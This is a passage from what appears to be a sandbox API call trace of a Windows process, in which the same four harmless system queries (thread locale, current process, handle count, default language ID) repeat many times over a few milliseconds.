[0094.431] GetThreadLocale () returned 0x409 [0094.431] GetCurrentProcess () returned 0xffffffff [0094.431] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.431] GetSystemDefaultLangID () returned 0x2710409 [0094.432] GetThreadLocale () returned 0x409 [0094.432] GetCurrentProcess () returned 0xffffffff [0094.432] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.432] GetSystemDefaultLangID () returned 0x2710409 [0094.432] GetThreadLocale () returned 0x409 [0094.432] GetCurrentProcess () returned 0xffffffff [0094.432] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.432] GetSystemDefaultLangID () returned 0x2710409 [0094.432] GetThreadLocale () returned 0x409 [0094.432] GetCurrentProcess () returned 0xffffffff [0094.432] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.432] GetSystemDefaultLangID () returned 0x2710409 [0094.432] GetThreadLocale () returned 0x409 [0094.432] GetCurrentProcess () returned 0xffffffff [0094.432] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.432] GetSystemDefaultLangID () returned 0x2710409 [0094.432] GetThreadLocale () returned 0x409 [0094.432] GetCurrentProcess () returned 0xffffffff [0094.432] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.432] GetSystemDefaultLangID () returned 0x2710409 [0094.432] GetThreadLocale () returned 0x409 [0094.432] GetCurrentProcess () returned 0xffffffff [0094.432] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.432] GetSystemDefaultLangID () returned 0x2710409 [0094.432] GetThreadLocale () returned 0x409 [0094.432] GetCurrentProcess () returned 0xffffffff [0094.432] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.432] GetSystemDefaultLangID () returned 0x2710409 [0094.432] GetThreadLocale () returned 0x409 [0094.432] GetCurrentProcess () returned 0xffffffff [0094.432] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.432] GetSystemDefaultLangID () returned 0x2710409 [0094.432] GetThreadLocale () returned 0x409 [0094.432] GetCurrentProcess () returned 0xffffffff [0094.433] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.433] GetSystemDefaultLangID () returned 0x2710409 [0094.433] GetThreadLocale () returned 0x409 [0094.433] GetCurrentProcess () returned 0xffffffff [0094.433] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.433] GetSystemDefaultLangID () returned 0x2710409 [0094.433] GetThreadLocale () returned 0x409 [0094.433] GetCurrentProcess () returned 0xffffffff [0094.433] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.433] GetSystemDefaultLangID () returned 0x2710409 [0094.433] GetThreadLocale () returned 0x409 [0094.433] GetCurrentProcess () returned 0xffffffff [0094.433] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.433] GetSystemDefaultLangID () returned 0x2710409 [0094.433] GetThreadLocale () returned 0x409 [0094.433] GetCurrentProcess () returned 0xffffffff [0094.433] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.433] GetSystemDefaultLangID () returned 0x2710409 [0094.433] GetThreadLocale () returned 0x409 [0094.433] GetCurrentProcess () returned 0xffffffff [0094.433] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.433] GetSystemDefaultLangID () returned 0x2710409 [0094.433] GetThreadLocale () returned 0x409 [0094.433] GetCurrentProcess () returned 0xffffffff [0094.433] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.433] GetSystemDefaultLangID () returned 0x2710409 [0094.433] GetThreadLocale () returned 0x409 [0094.433] GetCurrentProcess () returned 0xffffffff [0094.433] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.433] GetSystemDefaultLangID () returned 0x2710409 [0094.433] GetThreadLocale () returned 0x409 [0094.433] GetCurrentProcess () returned 0xffffffff [0094.433] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.434] GetSystemDefaultLangID () returned 0x2710409 [0094.434] GetThreadLocale () returned 0x409 [0094.434] GetCurrentProcess () returned 0xffffffff [0094.434] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.434] GetSystemDefaultLangID () returned 0x2710409 [0094.434] GetThreadLocale () returned 0x409 [0094.434] GetCurrentProcess () returned 0xffffffff [0094.434] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.434] GetSystemDefaultLangID () returned 0x2710409 [0094.434] GetThreadLocale () returned 0x409 [0094.434] GetCurrentProcess () returned 0xffffffff [0094.434] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.434] GetSystemDefaultLangID () returned 0x2710409 [0094.434] GetThreadLocale () returned 0x409 [0094.434] GetCurrentProcess () returned 0xffffffff [0094.434] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.434] GetSystemDefaultLangID () returned 0x2710409 [0094.434] GetThreadLocale () returned 0x409 [0094.434] GetCurrentProcess () returned 0xffffffff [0094.434] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.434] GetSystemDefaultLangID () returned 0x2710409 [0094.434] GetThreadLocale () returned 0x409 [0094.434] GetCurrentProcess () returned 0xffffffff [0094.434] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.434] GetSystemDefaultLangID () returned 0x2710409 [0094.434] GetThreadLocale () returned 0x409 [0094.434] GetCurrentProcess () returned 0xffffffff [0094.434] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.434] GetSystemDefaultLangID () returned 0x2710409 [0094.434] GetThreadLocale () returned 0x409 [0094.434] GetCurrentProcess () returned 0xffffffff [0094.434] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.435] GetSystemDefaultLangID () returned 0x2710409 [0094.435] GetThreadLocale () returned 0x409 [0094.435] GetCurrentProcess () returned 0xffffffff [0094.435] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.435] GetSystemDefaultLangID () returned 0x2710409 [0094.435] GetThreadLocale () returned 0x409 [0094.435] GetCurrentProcess () returned 0xffffffff [0094.435] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.435] GetSystemDefaultLangID () returned 0x2710409 [0094.435] GetThreadLocale () returned 0x409 [0094.435] GetCurrentProcess () returned 0xffffffff [0094.435] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.435] GetSystemDefaultLangID () returned 0x2710409 [0094.435] GetThreadLocale () returned 0x409 [0094.435] GetCurrentProcess () returned 0xffffffff [0094.435] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.435] GetSystemDefaultLangID () returned 0x2710409 [0094.435] GetThreadLocale () returned 0x409 [0094.435] GetCurrentProcess () returned 0xffffffff [0094.435] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.435] GetSystemDefaultLangID () returned 0x2710409 [0094.435] GetThreadLocale () returned 0x409 [0094.435] GetCurrentProcess () returned 0xffffffff [0094.435] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.435] GetSystemDefaultLangID () returned 0x2710409 [0094.435] GetThreadLocale () returned 0x409 [0094.435] GetCurrentProcess () returned 0xffffffff [0094.435] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.435] GetSystemDefaultLangID () returned 0x2710409 [0094.435] GetThreadLocale () returned 0x409 [0094.435] GetCurrentProcess () returned 0xffffffff [0094.435] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.436] GetSystemDefaultLangID () returned 0x2710409 [0094.436] GetThreadLocale () returned 0x409 [0094.436] GetCurrentProcess () returned 0xffffffff [0094.436] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.436] GetSystemDefaultLangID () returned 0x2710409 [0094.436] GetThreadLocale () returned 0x409 [0094.436] GetCurrentProcess () returned 0xffffffff [0094.436] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.436] GetSystemDefaultLangID () returned 0x2710409 [0094.436] GetThreadLocale () returned 0x409 [0094.436] GetCurrentProcess () returned 0xffffffff [0094.436] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.436] GetSystemDefaultLangID () returned 0x2710409 [0094.436] GetThreadLocale () returned 0x409 [0094.436] GetCurrentProcess () returned 0xffffffff [0094.436] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.436] GetSystemDefaultLangID () returned 0x2710409 [0094.436] GetThreadLocale () returned 0x409 [0094.436] GetCurrentProcess () returned 0xffffffff [0094.436] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.436] GetSystemDefaultLangID () returned 0x2710409 [0094.436] GetThreadLocale () returned 0x409 [0094.436] GetCurrentProcess () returned 0xffffffff [0094.436] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.436] GetSystemDefaultLangID () returned 0x2710409 [0094.436] GetThreadLocale () returned 0x409 [0094.436] GetCurrentProcess () returned 0xffffffff [0094.436] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.436] GetSystemDefaultLangID () returned 0x2710409 [0094.436] GetThreadLocale () returned 0x409 [0094.436] GetCurrentProcess () returned 0xffffffff [0094.436] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.436] GetSystemDefaultLangID () returned 0x2710409 [0094.437] GetThreadLocale () returned 0x409 [0094.437] GetCurrentProcess () returned 0xffffffff [0094.437] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.437] GetSystemDefaultLangID () returned 0x2710409 [0094.437] GetThreadLocale () returned 0x409 [0094.437] GetCurrentProcess () returned 0xffffffff [0094.437] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.437] GetSystemDefaultLangID () returned 0x2710409 [0094.437] GetThreadLocale () returned 0x409 [0094.437] GetCurrentProcess () returned 0xffffffff [0094.437] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.437] GetSystemDefaultLangID () returned 0x2710409 [0094.437] GetThreadLocale () returned 0x409 [0094.437] GetCurrentProcess () returned 0xffffffff [0094.437] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.437] GetSystemDefaultLangID () returned 0x2710409 [0094.437] GetThreadLocale () returned 0x409 [0094.437] GetCurrentProcess () returned 0xffffffff [0094.437] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.437] GetSystemDefaultLangID () returned 0x2710409 [0094.437] GetThreadLocale () returned 0x409 [0094.437] GetCurrentProcess () returned 0xffffffff [0094.437] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.437] GetSystemDefaultLangID () returned 0x2710409 [0094.437] GetThreadLocale () returned 0x409 [0094.437] GetCurrentProcess () returned 0xffffffff [0094.437] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.437] GetSystemDefaultLangID () returned 0x2710409 [0094.437] GetThreadLocale () returned 0x409 [0094.437] GetCurrentProcess () returned 0xffffffff [0094.437] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.437] GetSystemDefaultLangID () returned 0x2710409 [0094.437] GetThreadLocale () returned 0x409 [0094.437] GetCurrentProcess () returned 0xffffffff [0094.437] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.438] GetSystemDefaultLangID () returned 0x2710409 [0094.438] GetThreadLocale () returned 0x409 [0094.438] GetCurrentProcess () returned 0xffffffff [0094.438] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.438] GetSystemDefaultLangID () returned 0x2710409 [0094.438] GetThreadLocale () returned 0x409 [0094.438] GetCurrentProcess () returned 0xffffffff [0094.438] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.438] GetSystemDefaultLangID () returned 0x2710409 [0094.438] GetThreadLocale () returned 0x409 [0094.438] GetCurrentProcess () returned 0xffffffff [0094.438] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.438] GetSystemDefaultLangID () returned 0x2710409 [0094.438] GetThreadLocale () returned 0x409 [0094.438] GetCurrentProcess () returned 0xffffffff [0094.438] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.438] GetSystemDefaultLangID () returned 0x2710409 [0094.438] GetThreadLocale () returned 0x409 [0094.438] GetCurrentProcess () returned 0xffffffff [0094.438] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.438] GetSystemDefaultLangID () returned 0x2710409 [0094.438] GetThreadLocale () returned 0x409 [0094.438] GetCurrentProcess () returned 0xffffffff [0094.438] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.438] GetSystemDefaultLangID () returned 0x2710409 [0094.438] GetThreadLocale () returned 0x409 [0094.438] GetCurrentProcess () returned 0xffffffff [0094.438] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.438] GetSystemDefaultLangID () returned 0x2710409 [0094.438] GetThreadLocale () returned 0x409 [0094.438] GetCurrentProcess () returned 0xffffffff [0094.438] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.438] GetSystemDefaultLangID () returned 0x2710409 [0094.438] GetThreadLocale () returned 0x409 [0094.439] GetCurrentProcess () returned 0xffffffff [0094.439] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.439] GetSystemDefaultLangID () returned 0x2710409 [0094.439] GetThreadLocale () returned 0x409 [0094.439] GetCurrentProcess () returned 0xffffffff [0094.439] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.439] GetSystemDefaultLangID () returned 0x2710409 [0094.439] GetThreadLocale () returned 0x409 [0094.439] GetCurrentProcess () returned 0xffffffff [0094.439] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.439] GetSystemDefaultLangID () returned 0x2710409 [0094.439] GetThreadLocale () returned 0x409 [0094.439] GetCurrentProcess () returned 0xffffffff [0094.439] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.439] GetSystemDefaultLangID () returned 0x2710409 [0094.439] GetThreadLocale () returned 0x409 [0094.439] GetCurrentProcess () returned 0xffffffff [0094.439] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.439] GetSystemDefaultLangID () returned 0x2710409 [0094.439] GetThreadLocale () returned 0x409 [0094.439] GetCurrentProcess () returned 0xffffffff [0094.439] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.439] GetSystemDefaultLangID () returned 0x2710409 [0094.439] GetThreadLocale () returned 0x409 [0094.439] GetCurrentProcess () returned 0xffffffff [0094.439] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.439] GetSystemDefaultLangID () returned 0x2710409 [0094.439] GetThreadLocale () returned 0x409 [0094.439] GetCurrentProcess () returned 0xffffffff [0094.439] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.439] GetSystemDefaultLangID () returned 0x2710409 [0094.439] GetThreadLocale () returned 0x409 [0094.439] GetCurrentProcess () returned 0xffffffff [0094.439] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.439] GetSystemDefaultLangID () returned 0x2710409 [0094.440] GetThreadLocale () returned 0x409 [0094.440] GetCurrentProcess () returned 0xffffffff [0094.440] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.440] GetSystemDefaultLangID () returned 0x2710409 [0094.440] GetThreadLocale () returned 0x409 [0094.440] GetCurrentProcess () returned 0xffffffff [0094.440] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.440] GetSystemDefaultLangID () returned 0x2710409 [0094.440] GetThreadLocale () returned 0x409 [0094.440] GetCurrentProcess () returned 0xffffffff [0094.440] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.440] GetSystemDefaultLangID () returned 0x2710409 [0094.440] GetThreadLocale () returned 0x409 [0094.440] GetCurrentProcess () returned 0xffffffff [0094.440] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.440] GetSystemDefaultLangID () returned 0x2710409 [0094.440] GetThreadLocale () returned 0x409 [0094.440] GetCurrentProcess () returned 0xffffffff [0094.440] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.440] GetSystemDefaultLangID () returned 0x2710409 [0094.440] GetThreadLocale () returned 0x409 [0094.440] GetCurrentProcess () returned 0xffffffff [0094.441] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.441] GetSystemDefaultLangID () returned 0x2710409 [0094.441] GetThreadLocale () returned 0x409 [0094.441] GetCurrentProcess () returned 0xffffffff [0094.441] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.441] GetSystemDefaultLangID () returned 0x2710409 [0094.441] GetThreadLocale () returned 0x409 [0094.441] GetCurrentProcess () returned 0xffffffff [0094.441] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.441] GetSystemDefaultLangID () returned 0x2710409 [0094.441] GetThreadLocale () returned 0x409 [0094.441] GetCurrentProcess () returned 0xffffffff [0094.441] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.441] GetSystemDefaultLangID () returned 0x2710409 [0094.441] GetThreadLocale () returned 0x409 [0094.441] GetCurrentProcess () returned 0xffffffff [0094.441] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.441] GetSystemDefaultLangID () returned 0x2710409 [0094.441] GetThreadLocale () returned 0x409 [0094.441] GetCurrentProcess () returned 0xffffffff [0094.441] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.441] GetSystemDefaultLangID () returned 0x2710409 [0094.441] GetThreadLocale () returned 0x409 [0094.441] GetCurrentProcess () returned 0xffffffff [0094.441] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.441] GetSystemDefaultLangID () returned 0x2710409 [0094.441] GetThreadLocale () returned 0x409 [0094.441] GetCurrentProcess () returned 0xffffffff [0094.441] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.441] GetSystemDefaultLangID () returned 0x2710409 [0094.441] GetThreadLocale () returned 0x409 [0094.441] GetCurrentProcess () returned 0xffffffff [0094.442] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.442] GetSystemDefaultLangID () returned 0x2710409 [0094.442] GetThreadLocale () returned 0x409 [0094.442] GetCurrentProcess () returned 0xffffffff [0094.442] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.442] GetSystemDefaultLangID () returned 0x2710409 [0094.442] GetThreadLocale () returned 0x409 [0094.442] GetCurrentProcess () returned 0xffffffff [0094.442] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.442] GetSystemDefaultLangID () returned 0x2710409 [0094.442] GetThreadLocale () returned 0x409 [0094.442] GetCurrentProcess () returned 0xffffffff [0094.442] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.442] GetSystemDefaultLangID () returned 0x2710409 [0094.442] GetThreadLocale () returned 0x409 [0094.442] GetCurrentProcess () returned 0xffffffff [0094.442] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.442] GetSystemDefaultLangID () returned 0x2710409 [0094.442] GetThreadLocale () returned 0x409 [0094.442] GetCurrentProcess () returned 0xffffffff [0094.442] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.442] GetSystemDefaultLangID () returned 0x2710409 [0094.442] GetThreadLocale () returned 0x409 [0094.442] GetCurrentProcess () returned 0xffffffff [0094.442] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.442] GetSystemDefaultLangID () returned 0x2710409 [0094.442] GetThreadLocale () returned 0x409 [0094.442] GetCurrentProcess () returned 0xffffffff [0094.442] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.442] GetSystemDefaultLangID () returned 0x2710409 [0094.443] GetThreadLocale () returned 0x409 [0094.443] GetCurrentProcess () returned 0xffffffff [0094.443] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.443] GetSystemDefaultLangID () returned 0x2710409 [0094.443] GetThreadLocale () returned 0x409 [0094.443] GetCurrentProcess () returned 0xffffffff [0094.443] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.443] GetSystemDefaultLangID () returned 0x2710409 [0094.443] GetThreadLocale () returned 0x409 [0094.443] GetCurrentProcess () returned 0xffffffff [0094.443] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.443] GetSystemDefaultLangID () returned 0x2710409 [0094.443] GetThreadLocale () returned 0x409 [0094.443] GetCurrentProcess () returned 0xffffffff [0094.443] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.443] GetSystemDefaultLangID () returned 0x2710409 [0094.443] GetThreadLocale () returned 0x409 [0094.443] GetCurrentProcess () returned 0xffffffff [0094.443] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.443] GetSystemDefaultLangID () returned 0x2710409 [0094.443] GetThreadLocale () returned 0x409 [0094.443] GetCurrentProcess () returned 0xffffffff [0094.443] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.443] GetSystemDefaultLangID () returned 0x2710409 [0094.443] GetThreadLocale () returned 0x409 [0094.444] GetCurrentProcess () returned 0xffffffff [0094.444] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.444] GetSystemDefaultLangID () returned 0x2710409 [0094.444] GetThreadLocale () returned 0x409 [0094.444] GetCurrentProcess () returned 0xffffffff [0094.444] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.444] GetSystemDefaultLangID () returned 0x2710409 [0094.444] GetThreadLocale () returned 0x409 [0094.444] GetCurrentProcess () returned 0xffffffff [0094.444] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.444] GetSystemDefaultLangID () returned 0x2710409 [0094.444] GetThreadLocale () returned 0x409 [0094.444] GetCurrentProcess () returned 0xffffffff [0094.444] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.444] GetSystemDefaultLangID () returned 0x2710409 [0094.444] GetThreadLocale () returned 0x409 [0094.444] GetCurrentProcess () returned 0xffffffff [0094.444] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.444] GetSystemDefaultLangID () returned 0x2710409 [0094.444] GetThreadLocale () returned 0x409 [0094.444] GetCurrentProcess () returned 0xffffffff [0094.444] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.444] GetSystemDefaultLangID () returned 0x2710409 [0094.444] GetThreadLocale () returned 0x409 [0094.444] GetCurrentProcess () returned 0xffffffff [0094.444] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.445] GetSystemDefaultLangID () returned 0x2710409 [0094.445] GetThreadLocale () returned 0x409 [0094.445] GetCurrentProcess () returned 0xffffffff [0094.445] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.445] GetSystemDefaultLangID () returned 0x2710409 [0094.445] GetThreadLocale () returned 0x409 [0094.445] GetCurrentProcess () returned 0xffffffff [0094.445] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.445] GetSystemDefaultLangID () returned 0x2710409 [0094.445] GetThreadLocale () returned 0x409 [0094.445] GetCurrentProcess () returned 0xffffffff [0094.445] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.445] GetSystemDefaultLangID () returned 0x2710409 [0094.445] GetThreadLocale () returned 0x409 [0094.445] GetCurrentProcess () returned 0xffffffff [0094.445] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.445] GetSystemDefaultLangID () returned 0x2710409 [0094.445] GetThreadLocale () returned 0x409 [0094.445] GetCurrentProcess () returned 0xffffffff [0094.445] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.445] GetSystemDefaultLangID () returned 0x2710409 [0094.445] GetThreadLocale () returned 0x409 [0094.445] GetCurrentProcess () returned 0xffffffff [0094.445] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.445] GetSystemDefaultLangID () returned 0x2710409 [0094.445] GetThreadLocale () returned 0x409 [0094.445] GetCurrentProcess () returned 0xffffffff [0094.446] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.446] GetSystemDefaultLangID () returned 0x2710409 [0094.446] GetThreadLocale () returned 0x409 [0094.446] GetCurrentProcess () returned 0xffffffff [0094.446] GetProcessHandleCount (in: 